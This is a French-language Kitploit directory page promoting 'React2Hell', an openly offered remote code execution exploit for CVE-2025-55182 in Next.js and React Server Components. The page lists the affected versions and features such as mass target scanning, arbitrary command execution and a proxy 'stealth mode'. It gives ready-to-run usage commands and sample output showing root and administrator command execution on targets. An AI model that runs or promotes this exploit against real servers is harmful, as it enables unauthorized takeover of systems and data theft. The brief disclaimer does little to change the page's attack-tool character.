Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
React2Hell — [React2Hell] Exploit RCE Next.js/React Server — CVE-2025-55182 | Kitploit
Outils/GitHubGitHub/aggressiveuser/react2hell
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubaggressiveuser/react2hell

React2Hell

[React2Hell] Exploit RCE Next.js/React Server — CVE-2025-55182

Voir le dépôt
3il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🧨 React2Hell — Exploitation de CVE-2025-55182

🔥 Exploitation d'exécution de code à distance (RCE) sur serveur Next.js / React

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React Server RCE Exploit — CVE-2025-55182
   Author: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 Aperçu

React2Hell est un puissant outil d'exploitation conçu pour tester et exploiter CVE-2025-55182, une vulnérabilité critique d'exécution de code à distance affectant Next.js et React Server Actions.

Une vulnérabilité d'exécution de code à distance sans authentification existe dans React Server Components versions 19.0.0, 19.1.0, 19.1.1 et 19.2.0, incluant les paquets suivants : react-server-dom-parcel, react-server-dom-turbopack et react-server-dom-webpack. Le code vulnérable désérialise de manière non sécurisée les charges utiles des requêtes HTTP vers les points de terminaison des fonctions serveur.


✨ Fonctionnalités

  • 🧨 Exécution de code à distance (RCE)
  • 🌐 Scan d'une seule URL / de plusieurs URL
  • 🧩 Exécution de commandes personnalisées
  • 🕵️‍♂️ Mode furtif avec support de proxy
  • ⚡ Rapide, fiable et facile à utiliser

📌 Utilisation

Mode cible unique

root@kitploit:~
python exploit.py -u https://target.com -c "whoami"

Cibles multiples (depuis un fichier)

root@kitploit:~
python exploit.py -l urls.txt -c "whoami"

Avec proxy HTTP (Burp Suite)

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080

Avec proxy HTTPS

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080

📁 Exemple de urls.txt

root@kitploit:~
http://site1.com
https://site2.com
http://192.168.1.10:3000

🖥️ Exemple de sortie

root@kitploit:~
PS D:\AggressiveUser_PVT\React2Hell> python.exe .\exploit.py -l .\list.txt -c whoami


█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React Server RCE Exploit — CVE-2025-55182
   Author: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════

[→] Target: http://meow.host:3113/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────

[→] Target: http://evil.lab:2000/
[→] Exec:   whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────

[→] Target: https://vul.lab:3000/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\AggressiveUser_PVT\React2Hell>

⚠️ Avertissement

Cet outil est créé strictement à des fins éducatives et de recherche en sécurité. Ne l'utilisez pas sur des systèmes sans autorisation explicite. Vous êtes responsable de vos propres actions.


⭐ Soutenir le projet

Si cette exploitation vous a aidé, pensez à laisser une ⭐ sur GitHub ❤️


👤 Auteur

Chetanya Sharma AggressiveUser

Fait avec 🔥 par quelqu'un qui aime casser et réparer des trucs.


Télécharger l’outil